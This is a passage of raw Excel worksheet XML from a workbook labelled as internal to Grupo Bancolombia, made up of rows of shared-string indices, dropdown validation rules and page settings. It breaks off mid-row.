      <c r="K78" s="17"/>
      <c r="L78" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M78" s="17"/>
      <c r="N78" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O78" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P78" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="79" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A79" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B79" s="1"/>
      <c r="C79" s="1"/>
      <c r="D79" s="1"/>
      <c r="E79" s="1" t="s">
        <v>4057</v>
      </c>
      <c r="F79" s="26">
        <v>100</v>
      </c>
      <c r="G79" s="26"/>
      <c r="H79" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I79" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J79" s="1"/>
      <c r="K79" s="1"/>
      <c r="L79" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M79" s="1"/>
      <c r="N79" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O79" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P79" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="80" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A80" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B80" s="17"/>
      <c r="C80" s="17"/>
      <c r="D80" s="17"/>
      <c r="E80" s="17" t="s">
        <v>4058</v>
      </c>
      <c r="F80" s="25">
        <v>100</v>
      </c>
      <c r="G80" s="25"/>
      <c r="H80" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I80" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J80" s="17"/>
      <c r="K80" s="17"/>
      <c r="L80" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M80" s="17"/>
      <c r="N80" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O80" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P80" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="81" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A81" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B81" s="1"/>
      <c r="C81" s="1"/>
      <c r="D81" s="17"/>
      <c r="E81" s="16" t="s">
        <v>4059</v>
      </c>
      <c r="F81" s="26">
        <v>100</v>
      </c>
      <c r="G81" s="26"/>
      <c r="H81" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I81" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J81" s="1" t="s">
        <v>779</v>
      </c>
      <c r="K81" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L81" s="1" t="s">
        <v>779</v>
      </c>
      <c r="M81" s="1"/>
      <c r="N81" s="1"/>
      <c r="O81" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P81" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="82" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A82" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B82" s="1"/>
      <c r="C82" s="1"/>
      <c r="D82" s="1"/>
      <c r="E82" s="1" t="s">
        <v>4060</v>
      </c>
      <c r="F82" s="26">
        <v>100</v>
      </c>
      <c r="G82" s="26"/>
      <c r="H82" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I82" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J82" s="1"/>
      <c r="K82" s="1"/>
      <c r="L82" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M82" s="1"/>
      <c r="N82" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O82" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P82" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="83" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A83" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B83" s="17"/>
      <c r="C83" s="17"/>
      <c r="D83" s="17"/>
      <c r="E83" s="17" t="s">
        <v>4061</v>
      </c>
      <c r="F83" s="25">
        <v>100</v>
      </c>
      <c r="G83" s="25"/>
      <c r="H83" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I83" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J83" s="17"/>
      <c r="K83" s="17"/>
      <c r="L83" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M83" s="17"/>
      <c r="N83" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O83" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P83" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="84" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A84" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B84" s="1"/>
      <c r="C84" s="1"/>
      <c r="D84" s="1"/>
      <c r="E84" s="1" t="s">
        <v>4062</v>
      </c>
      <c r="F84" s="26">
        <v>100</v>
      </c>
      <c r="G84" s="26"/>
      <c r="H84" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I84" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J84" s="1"/>
      <c r="K84" s="1"/>
      <c r="L84" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M84" s="1"/>
      <c r="N84" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O84" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P84" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="85" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A85" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B85" s="17"/>
      <c r="C85" s="17"/>
      <c r="D85" s="17"/>
      <c r="E85" s="17" t="s">
        <v>4063</v>
      </c>
      <c r="F85" s="25">
        <v>100</v>
      </c>
      <c r="G85" s="25"/>
      <c r="H85" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I85" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J85" s="17"/>
      <c r="K85" s="17"/>
      <c r="L85" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M85" s="17"/>
      <c r="N85" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O85" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P85" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="86" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A86" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B86" s="1"/>
      <c r="C86" s="1"/>
      <c r="D86" s="17"/>
      <c r="E86" s="16" t="s">
        <v>4064</v>
      </c>
      <c r="F86" s="26">
        <v>100</v>
      </c>
      <c r="G86" s="26"/>
      <c r="H86" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I86" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J86" s="1" t="s">
        <v>779</v>
      </c>
      <c r="K86" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L86" s="1" t="s">
        <v>779</v>
      </c>
      <c r="M86" s="1"/>
      <c r="N86" s="1"/>
      <c r="O86" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P86" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="87" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A87" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B87" s="17"/>
      <c r="C87" s="17"/>
      <c r="D87" s="17"/>
      <c r="E87" s="1" t="s">
        <v>4065</v>
      </c>
      <c r="F87" s="25">
        <v>100</v>
      </c>
      <c r="G87" s="25"/>
      <c r="H87" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I87" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J87" s="17" t="s">
        <v>779</v>
      </c>
      <c r="K87" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L87" s="1" t="s">
        <v>779</v>
      </c>
      <c r="M87" s="17"/>
      <c r="N87" s="17"/>
      <c r="O87" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P87" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="88" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A88" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B88" s="1"/>
      <c r="C88" s="1"/>
      <c r="D88" s="1"/>
      <c r="E88" s="1" t="s">
        <v>4066</v>
      </c>
      <c r="F88" s="26">
        <v>100</v>
      </c>
      <c r="G88" s="26"/>
      <c r="H88" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I88" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J88" s="1"/>
      <c r="K88" s="1"/>
      <c r="L88" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M88" s="1"/>
      <c r="N88" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O88" s="1" t="s">
        <v>176</v>
      </c>
      <c r="P88" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="89" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A89" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B89" s="1"/>
      <c r="C89" s="1"/>
      <c r="D89" s="1"/>
      <c r="E89" s="1" t="s">
        <v>4067</v>
      </c>
      <c r="F89" s="26">
        <v>100</v>
      </c>
      <c r="G89" s="26"/>
      <c r="H89" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I89" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J89" s="1"/>
      <c r="K89" s="1"/>
      <c r="L89" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M89" s="1"/>
      <c r="N89" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O89" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P89" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="90" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A90" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B90" s="17"/>
      <c r="C90" s="17"/>
      <c r="D90" s="17"/>
      <c r="E90" s="17" t="s">
        <v>4068</v>
      </c>
      <c r="F90" s="25">
        <v>100</v>
      </c>
      <c r="G90" s="25"/>
      <c r="H90" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I90" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J90" s="17"/>
      <c r="K90" s="17"/>
      <c r="L90" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M90" s="17"/>
      <c r="N90" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O90" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P90" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="91" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A91" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B91" s="1"/>
      <c r="C91" s="1"/>
      <c r="D91" s="1"/>
      <c r="E91" s="1" t="s">
        <v>4069</v>
      </c>
      <c r="F91" s="26">
        <v>100</v>
      </c>
      <c r="G91" s="26"/>
      <c r="H91" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I91" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J91" s="1"/>
      <c r="K91" s="1"/>
      <c r="L91" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M91" s="1"/>
      <c r="N91" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O91" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P91" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="92" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A92" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B92" s="36"/>
      <c r="C92" s="36"/>
      <c r="D92" s="36"/>
      <c r="E92" s="36" t="s">
        <v>4070</v>
      </c>
      <c r="F92" s="25">
        <v>100</v>
      </c>
      <c r="G92" s="25"/>
      <c r="H92" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I92" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J92" s="17"/>
      <c r="K92" s="17"/>
      <c r="L92" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M92" s="17"/>
      <c r="N92" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O92" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P92" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="93" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A93" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B93" s="35"/>
      <c r="C93" s="35"/>
      <c r="D93" s="35"/>
      <c r="E93" s="35" t="s">
        <v>4071</v>
      </c>
      <c r="F93" s="26">
        <v>100</v>
      </c>
      <c r="G93" s="26"/>
      <c r="H93" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I93" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J93" s="1"/>
      <c r="K93" s="1"/>
      <c r="L93" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M93" s="1"/>
      <c r="N93" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O93" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P93" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="94" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A94" s="17" t="s">
        <v>5</v>
      </c>
      <c r="B94" s="36"/>
      <c r="C94" s="36"/>
      <c r="D94" s="36"/>
      <c r="E94" s="36" t="s">
        <v>4072</v>
      </c>
      <c r="F94" s="25">
        <v>100</v>
      </c>
      <c r="G94" s="25"/>
      <c r="H94" s="17" t="s">
        <v>1074</v>
      </c>
      <c r="I94" s="17" t="s">
        <v>185</v>
      </c>
      <c r="J94" s="17"/>
      <c r="K94" s="17"/>
      <c r="L94" s="17" t="s">
        <v>3975</v>
      </c>
      <c r="M94" s="17"/>
      <c r="N94" s="17" t="s">
        <v>3976</v>
      </c>
      <c r="O94" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P94" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="95" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A95" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B95" s="35"/>
      <c r="C95" s="35"/>
      <c r="D95" s="35"/>
      <c r="E95" s="35" t="s">
        <v>4073</v>
      </c>
      <c r="F95" s="26">
        <v>100</v>
      </c>
      <c r="G95" s="26"/>
      <c r="H95" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I95" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J95" s="1"/>
      <c r="K95" s="1"/>
      <c r="L95" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="M95" s="1"/>
      <c r="N95" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="O95" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P95" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="96" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A96" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B96" s="36"/>
      <c r="C96" s="36"/>
      <c r="D96" s="36"/>
      <c r="E96" s="35" t="s">
        <v>4074</v>
      </c>
      <c r="F96" s="26">
        <v>100</v>
      </c>
      <c r="G96" s="26"/>
      <c r="H96" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I96" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J96" s="1" t="s">
        <v>779</v>
      </c>
      <c r="K96" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L96" s="1" t="s">
        <v>779</v>
      </c>
      <c r="M96" s="1"/>
      <c r="N96" s="1"/>
      <c r="O96" s="17" t="s">
        <v>161</v>
      </c>
      <c r="P96" s="17" t="s">
        <v>3934</v>
      </c>
    </row>
    <row r="97" spans="1:16" x14ac:dyDescent="0.35">
      <c r="A97" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B97" s="35"/>
      <c r="C97" s="35"/>
      <c r="D97" s="35"/>
      <c r="E97" s="35" t="s">
        <v>4075</v>
      </c>
      <c r="F97" s="26">
        <v>100</v>
      </c>
      <c r="G97" s="26"/>
      <c r="H97" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I97" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J97" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K97" s="1" t="s">
        <v>4076</v>
      </c>
      <c r="L97" s="1" t="s">
        <v>4077</v>
      </c>
      <c r="M97" s="1"/>
      <c r="N97" s="1"/>
      <c r="O97" s="1" t="s">
        <v>161</v>
      </c>
      <c r="P97" s="1" t="s">
        <v>3934</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sort="0" autoFilter="0" pivotTables="0"/>
  <autoFilter ref="A1:P68" xr:uid="{A7BABA0B-6FA1-445A-8A89-DB968F6B6924}">
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:P97">
      <sortCondition ref="E1:E68"/>
    </sortState>
  </autoFilter>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="J54:J68 J92:J97" xr:uid="{F20A8B9C-50D7-4DC4-9A02-4CF6D4BA70F3}">
      <formula1>INDIRECT(I54)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="N46:N49 N91 N85:N88" xr:uid="{8CD2E531-3A14-436D-9EA0-326889FF0919}">
      <formula1>INDIRECT(L46)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="L2:L53 L69:L91" xr:uid="{FC77DC47-E286-4C48-9E51-B29287A503C1}">
      <formula1>INDIRECT(I2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHead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18A6E0ED-47D4-478D-8301-F2E8AABF4F18}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I97</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45FEB-8649-4B51-AF02-CA66AEDBA61C}">
  <sheetPr codeName="Hoja16"/>
  <dimension ref="A1:R6"/>
  <sheetViews>
    <sheetView topLeftCell="L1" workbookViewId="0">
      <selection activeCell="O5" sqref="O5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="25.6328125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="33.90625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="39.08984375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="56" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="44.6328125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="41.90625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="32.453125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.6328125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="39.54296875" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="34.6328125" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="64.36328125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="53.453125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="56.6328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="29" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="47.90625" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="47.90625" customWidth="1"/>
    <col min="17" max="17" width="19.453125" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="23.08984375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:18" ht="15" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A1" s="7" t="s">
        <v>172</v>
      </c>
      <c r="B1" s="7" t="s">
        <v>185</v>
      </c>
      <c r="C1" s="7" t="s">
        <v>528</v>
      </c>
      <c r="D1" s="7" t="s">
        <v>203</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>179</v>
      </c>
      <c r="F1" s="7" t="s">
        <v>75</v>
      </c>
      <c r="G1" s="7" t="s">
        <v>156</v>
      </c>
      <c r="H1" s="7" t="s">
        <v>17</v>
      </c>
      <c r="I1" s="7" t="s">
        <v>82</v>
      </c>
      <c r="J1" s="7" t="s">
        <v>196</v>
      </c>
      <c r="K1" s="7" t="s">
        <v>268</v>
      </c>
      <c r="L1" s="7" t="s">
        <v>4035</v>
      </c>
      <c r="M1" s="7" t="s">
        <v>210</v>
      </c>
      <c r="N1" s="7" t="s">
        <v>611</v>
      </c>
      <c r="O1" s="7" t="s">
        <v>103</v>
      </c>
      <c r="P1" s="7" t="s">
        <v>546</v>
      </c>
      <c r="Q1" s="7" t="s">
        <v>31</v>
      </c>
      <c r="R1" s="7" t="s">
        <v>833</v>
      </c>
    </row>
    <row r="2" spans="1:18" x14ac:dyDescent="0.35">
      <c r="A2" s="8" t="s">
        <v>1238</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>542</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>529</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>204</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>180</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>76</v>
      </c>
      <c r="G2" s="3" t="s">
        <v>157</v>
      </c>
      <c r="H2" s="3" t="s">
        <v>1412</v>
      </c>
      <c r="I2" s="3" t="s">
        <v>32</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>722</v>
      </c>
      <c r="K2" s="3" t="s">
        <v>566</v>
      </c>
      <c r="L2" s="3" t="s">
        <v>4078</v>
      </c>
      <c r="M2" s="3" t="s">
        <v>4079</v>
      </c>
      <c r="N2" s="3" t="s">
        <v>3130</v>
      </c>
      <c r="O2" s="3" t="s">
        <v>4080</v>
      </c>
      <c r="P2" s="3" t="s">
        <v>547</v>
      </c>
      <c r="Q2" s="3" t="s">
        <v>262</v>
      </c>
      <c r="R2" s="10" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="3" spans="1:18" x14ac:dyDescent="0.35">
      <c r="A3" s="11" t="s">
        <v>4081</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>4082</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>3101</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>1006</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>236</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>226</v>
      </c>
      <c r="H3" s="1"/>
      <c r="I3" s="1" t="s">
        <v>43</v>
      </c>
      <c r="J3" s="4" t="s">
        <v>197</v>
      </c>
      <c r="K3" s="1" t="s">
        <v>269</v>
      </c>
      <c r="L3" s="1" t="s">
        <v>4083</v>
      </c>
      <c r="M3" s="1" t="s">
        <v>211</v>
      </c>
      <c r="N3" s="1" t="s">
        <v>4084</v>
      </c>
      <c r="O3" s="1" t="s">
        <v>104</v>
      </c>
      <c r="P3" s="1"/>
      <c r="Q3" s="1"/>
      <c r="R3" s="12"/>
    </row>
    <row r="4" spans="1:18" x14ac:dyDescent="0.35">
      <c r="A4" s="11" t="s">
        <v>2947</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>186</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>2501</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>4085</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>633</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>454</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>301</v>
      </c>
      <c r="H4" s="1"/>
      <c r="I4" s="2" t="s">
        <v>744</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>4086</v>
      </c>
      <c r="K4" s="1" t="s">
        <v>1572</v>
      </c>
      <c r="L4" s="1" t="s">
        <v>4087</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>779</v>
      </c>
      <c r="N4" s="1" t="s">
        <v>612</v>
      </c>
      <c r="O4" s="1" t="s">
        <v>4088</v>
      </c>
      <c r="P4" s="1"/>
      <c r="Q4" s="1"/>
      <c r="R4" s="12"/>
    </row>
    <row r="5" spans="1:18" x14ac:dyDescent="0.35">
      <c r="A5" s="11" t="s">
        <v>173</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>4089</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>4090</v>
      </c>
      <c r="D5" s="1"/>
      <c r="E5" s="1" t="s">
        <v>283</v>
      </c>
      <c r="F5" s="1"/>
      <c r="G5" s="1" t="s">
        <v>438</v>
      </c>
      <c r="H5" s="1"/>
      <c r="I5" s="2" t="s">
        <v>4015</v>
      </c>
      <c r="J5" s="1"/>
      <c r="K5" s="1"/>
      <c r="L5" s="1" t="s">
        <v>4036</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>919</v>
      </c>
      <c r="N5" s="1"/>
      <c r="O5" s="1" t="s">
        <v>147</v>
      </c>
      <c r="P5" s="1"/>
      <c r="Q5" s="1"/>
      <c r="R5" s="12"/>
    </row>
    <row r="6" spans="1:18" ht="15" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A6" s="13" t="s">
        <v>767</v>
      </c>
      <c r="B6" s="14"/>
      <c r="C6" s="14"/>
      <c r="D6" s="14"/>
      <c r="E6" s="14"/>
      <c r="F6" s="14"/>
      <c r="G6" s="14"/>
      <c r="H6" s="14"/>
      <c r="I6" s="14"/>
      <c r="J6" s="14"/>
      <c r="K6" s="14"/>
      <c r="L6" s="14"/>
      <c r="M6" s="14"/>
      <c r="N6" s="14"/>
      <c r="O6" s="14"/>
      <c r="P6" s="14"/>
      <c r="Q6" s="14"/>
      <c r="R6" s="15"/>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;C&amp;G&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#</oddHeader>
  </headerFooter>
  <legacyDrawing r:id="rId2"/>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8FC80-4819-47F5-BFE1-50732DD855A0}">
  <sheetPr codeName="Hoja17"/>
  <dimension ref="A1:D47"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="37" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="9.90625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="44.6328125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>4091</v>
      </c>
      <c r="B1" t="s">
        <v>4092</v>
      </c>
      <c r="C1" t="s">
        <v>4093</v>
      </c>
      <c r="D1" t="s">
        <v>4094</v>
      </c>
    </row>
    <row r="2" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>4095</v>
      </c>
      <c r="B2" t="s">
        <v>3933</v>
      </c>
      <c r="C2" t="s">
        <v>4096</v>
      </c>
      <c r="D2" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="3" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>4097</v>
      </c>
      <c r="B3" t="s">
        <v>3933</v>
      </c>
      <c r="C3" t="s">
        <v>4098</v>
      </c>
      <c r="D3" t="s">
        <v>4099</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>4100</v>
      </c>
      <c r="B4" t="s">
        <v>3933</v>
      </c>
      <c r="C4" t="s">
        <v>4101</v>
      </c>
      <c r="D4" t="s">
        <v>4102</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>4103</v>
      </c>
      <c r="B5" t="s">
        <v>3933</v>
      </c>
      <c r="C5" t="s">
        <v>4104</v>
      </c>
      <c r="D5" t="s">
        <v>4105</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>4106</v>
      </c>
      <c r="B6" t="s">
        <v>4107</v>
      </c>
      <c r="C6" t="s">
        <v>4108</v>
      </c>
      <c r="D6" t="s">
        <v>4109</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>4100</v>
      </c>
      <c r="B7" t="s">
        <v>4107</v>
      </c>
      <c r="C7" t="s">
        <v>4110</v>
      </c>
      <c r="D7" t="s">
        <v>1040</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>4111</v>
      </c>
      <c r="B8" t="s">
        <v>3933</v>
      </c>
      <c r="C8" t="s">
        <v>4112</v>
      </c>
      <c r="D8" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>4113</v>
      </c>
      <c r="B9" t="s">
        <v>3933</v>
      </c>
      <c r="C9" t="s">
        <v>4114</v>
      </c>
      <c r="D9" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>4115</v>
      </c>
      <c r="B10" t="s">
        <v>4107</v>
      </c>
      <c r="C10" t="s">
        <v>4116</v>
      </c>
      <c r="D10" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.35">
